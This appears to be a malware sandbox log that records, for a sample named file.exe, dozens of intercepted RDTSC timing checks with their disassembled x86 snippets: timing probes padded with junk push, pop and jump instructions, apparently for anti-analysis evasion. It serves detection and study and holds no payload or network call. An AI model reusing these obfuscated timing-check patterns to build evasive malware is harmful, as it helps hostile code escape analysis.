Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A468 second address: 127A478 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F6778CEBE46h 0x0000000a pop ebx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A478 second address: 127A482 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A482 second address: 127A48A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5D2 second address: 127A5E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jnp 00007F67787C0192h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5E3 second address: 127A5E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127A5E9 second address: 127A5F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F67787C018Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B904 second address: 125B908 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9D3 second address: 125C9D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B908 second address: 125B912 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edi 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DB44 second address: 125DB48 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9D7 second address: 125C9DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125B912 second address: 125B916 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125C9DD second address: 125C9F7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE51h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DB48 second address: 125DBC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C018Ch 0x0000000e popad 0x0000000f popad 0x00000010 nop 0x00000011 mov dword ptr [ebp+122D3199h], ebx 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007F67787C0188h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000014h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 pushad 0x00000039 or dword ptr [ebp+1246D150h], eax 0x0000003f mov esi, dword ptr [ebp+122D1E22h] 0x00000045 popad 0x00000046 mov dword ptr fs:[00000000h], esp 0x0000004d xor dword ptr [ebp+122D27BAh], edx 0x00000053 mov ebx, 13F66866h 0x00000058 mov eax, dword ptr [ebp+122D0CD1h] 0x0000005e mov dword ptr [ebp+12458764h], edx 0x00000064 push FFFFFFFFh 0x00000066 or ebx, dword ptr [ebp+1247CB69h] 0x0000006c push eax 0x0000006d pushad 0x0000006e pushad 0x0000006f push eax 0x00000070 push edx 0x00000071 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DBC2 second address: 125DBC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125DBC8 second address: 125DBD2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1260A6E second address: 1260A74 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1260A74 second address: 1260A78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1261B18 second address: 1261B4B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 jmp 00007F6778CEBE52h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F6778CEBE54h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EFF4 second address: 127EFFE instructions: 0x00000000 rdtsc 0x00000002 jne 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EFFE second address: 127F008 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F6778CEBE46h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F008 second address: 127F025 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007F67787C0192h 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F30D second address: 127F313 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F313 second address: 127F318 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F48A second address: 127F48F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F48F second address: 127F49A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F67787C0186h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EA76 second address: 127EA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F6778CEBE46h 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127EA83 second address: 127EA89 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127F906 second address: 127F916 instructions: 0x00000000 rdtsc 0x00000002 jno 00007F6778CEBE48h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b pop eax 0x0000000c push edx 0x0000000d pop edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD51 second address: 127FD57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD57 second address: 127FD5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 127FD5B second address: 127FD5F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1282C0C second address: 1282C10 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1A1 second address: 128A1A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1A5 second address: 128A1D8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F6778CEBE46h 0x00000008 jmp 00007F6778CEBE4Bh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pushad 0x00000010 jc 00007F6778CEBE46h 0x00000016 pushad 0x00000017 popad 0x00000018 pushad 0x00000019 popad 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007F6778CEBE4Eh 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A1D8 second address: 128A1DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A32E second address: 128A333 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A333 second address: 128A351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0192h 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a pop edi 0x0000000b jbe 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A351 second address: 128A355 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128A4C8 second address: 128A4D6 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128AA66 second address: 128AA86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6778CEBE50h 0x00000009 jmp 00007F6778CEBE4Ch 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128AD93 second address: 128ADB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C0199h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128ADB0 second address: 128ADD3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F6778CEBE50h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 128B2BC second address: 128B2C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC00 second address: 124EC05 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EC05 second address: 124EC0B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124ED4F second address: 124EDF1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 xchg eax, ebx 0x00000006 mov ecx, dword ptr [ebp+122D368Fh] 0x0000000c push dword ptr fs:[00000000h] 0x00000013 add dword ptr [ebp+122D19EBh], esi 0x00000019 mov dword ptr fs:[00000000h], esp 0x00000020 jmp 00007F6778CEBE4Bh 0x00000025 mov dword ptr [ebp+124929A0h], esp 0x0000002b push 00000000h 0x0000002d push esi 0x0000002e call 00007F6778CEBE48h 0x00000033 pop esi 0x00000034 mov dword ptr [esp+04h], esi 0x00000038 add dword ptr [esp+04h], 00000015h 0x00000040 inc esi 0x00000041 push esi 0x00000042 ret 0x00000043 pop esi 0x00000044 ret 0x00000045 cmp dword ptr [ebp+122D2BC5h], 00000000h 0x0000004c jne 00007F6778CEBF22h 0x00000052 and cx, A677h 0x00000057 mov byte ptr [ebp+122D3673h], 00000047h 0x0000005e push 00000000h 0x00000060 push edx 0x00000061 call 00007F6778CEBE48h 0x00000066 pop edx 0x00000067 mov dword ptr [esp+04h], edx 0x0000006b add dword ptr [esp+04h], 00000017h 0x00000073 inc edx 0x00000074 push edx 0x00000075 ret 0x00000076 pop edx 0x00000077 ret 0x00000078 mov edx, 5BAD99B3h 0x0000007d mov eax, D49AA7D2h 0x00000082 push eax 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 jmp 00007F6778CEBE4Dh 0x0000008c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EDF1 second address: 124EE06 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0191h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124EE06 second address: 124EE10 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2A0 second address: 124F2CC instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F67787C0186h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a add dword ptr [esp], 09893DA6h 0x00000011 mov dx, 86EAh 0x00000015 push F55E9819h 0x0000001a push eax 0x0000001b push edx 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F67787C018Eh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2CC second address: 124F2E4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE54h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F2E4 second address: 124F2EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F448 second address: 124F4AE instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop ecx 0x00000007 xchg eax, esi 0x00000008 push 00000000h 0x0000000a push ebx 0x0000000b call 00007F6778CEBE48h 0x00000010 pop ebx 0x00000011 mov dword ptr [esp+04h], ebx 0x00000015 add dword ptr [esp+04h], 00000014h 0x0000001d inc ebx 0x0000001e push ebx 0x0000001f ret 0x00000020 pop ebx 0x00000021 ret 0x00000022 mov dword ptr [ebp+122D327Bh], edx 0x00000028 nop 0x00000029 pushad 0x0000002a jmp 00007F6778CEBE50h 0x0000002f jmp 00007F6778CEBE4Bh 0x00000034 popad 0x00000035 push eax 0x00000036 push eax 0x00000037 push edx 0x00000038 pushad 0x00000039 jmp 00007F6778CEBE57h 0x0000003e push ecx 0x0000003f pop ecx 0x00000040 popad 0x00000041 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5A8 second address: 124F5B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007F67787C0186h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5B2 second address: 124F5C4 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [esp+04h] 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5C4 second address: 124F5CA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5CA second address: 124F5E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6778CEBE4Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F6778CEBE46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124F5E5 second address: 124F618 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F67787C0196h 0x0000000e popad 0x0000000f mov dword ptr [esp+04h], eax 0x00000013 push esi 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F67787C0186h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FD4E second address: 124FD52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FD52 second address: 124FD56 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FEFE second address: 124FF04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 124FFD9 second address: 1250043 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C018Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push ecx 0x0000000b push esi 0x0000000c or dh, FFFFFF91h 0x0000000f pop ecx 0x00000010 pop ecx 0x00000011 lea eax, dword ptr [ebp+1249298Ch] 0x00000017 jmp 00007F67787C018Ch 0x0000001c mov edx, 1FE92BF9h 0x00000021 push eax 0x00000022 jmp 00007F67787C0199h 0x00000027 mov dword ptr [esp], eax 0x0000002a mov ecx, dword ptr [ebp+122D3679h] 0x00000030 lea eax, dword ptr [ebp+12492948h] 0x00000036 mov edx, 6C6BC291h 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jng 00007F67787C0188h 0x00000044 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1250043 second address: 125004D instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6778CEBE4Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 125004D second address: 123230D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], eax 0x00000009 jmp 00007F67787C0197h 0x0000000e call dword ptr [ebp+122D17E5h] 0x00000014 push ecx 0x00000015 jmp 00007F67787C0192h 0x0000001a pop ecx 0x0000001b push eax 0x0000001c jp 00007F67787C018Eh 0x00000022 push ebx 0x00000023 pop ebx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129076C second address: 1290790 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F6778CEBE4Ch 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F6778CEBE4Fh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290912 second address: 1290918 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290918 second address: 129091E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290EBD second address: 1290ECE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b jc 00007F67787C0186h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290ECE second address: 1290EF8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jng 00007F6778CEBE48h 0x0000000c pushad 0x0000000d popad 0x0000000e push edx 0x0000000f jmp 00007F6778CEBE52h 0x00000014 pop edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jbe 00007F6778CEBE46h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1290EF8 second address: 1290EFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293765 second address: 129376A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129376A second address: 1293782 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F67787C018Eh 0x00000009 jnl 00007F67787C0186h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1293485 second address: 129348B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129348B second address: 129348F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129348F second address: 129349B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129349B second address: 129349F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12960A2 second address: 12960A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961CC second address: 12961D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961D0 second address: 12961E4 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F6778CEBE4Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 12961E4 second address: 12961EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129636F second address: 1296373 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296373 second address: 12963AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F67787C0192h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jmp 00007F67787C0198h 0x00000011 jnl 00007F67787C0186h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296562 second address: 1296570 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jne 00007F6778CEBE46h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 1296570 second address: 1296574 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C0F8 second address: 129C0FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C0FC second address: 129C129 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F67787C0196h 0x00000007 jmp 00007F67787C018Bh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 jno 00007F67787C0186h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C129 second address: 129C140 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 pushad 0x00000008 pushad 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b push edx 0x0000000c pop edx 0x0000000d js 00007F6778CEBE46h 0x00000013 popad 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C140 second address: 129C146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C146 second address: 129C155 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007F6778CEBE46h 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C155 second address: 129C159 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129C159 second address: 129C15F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 129B563 second address: 129B567 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
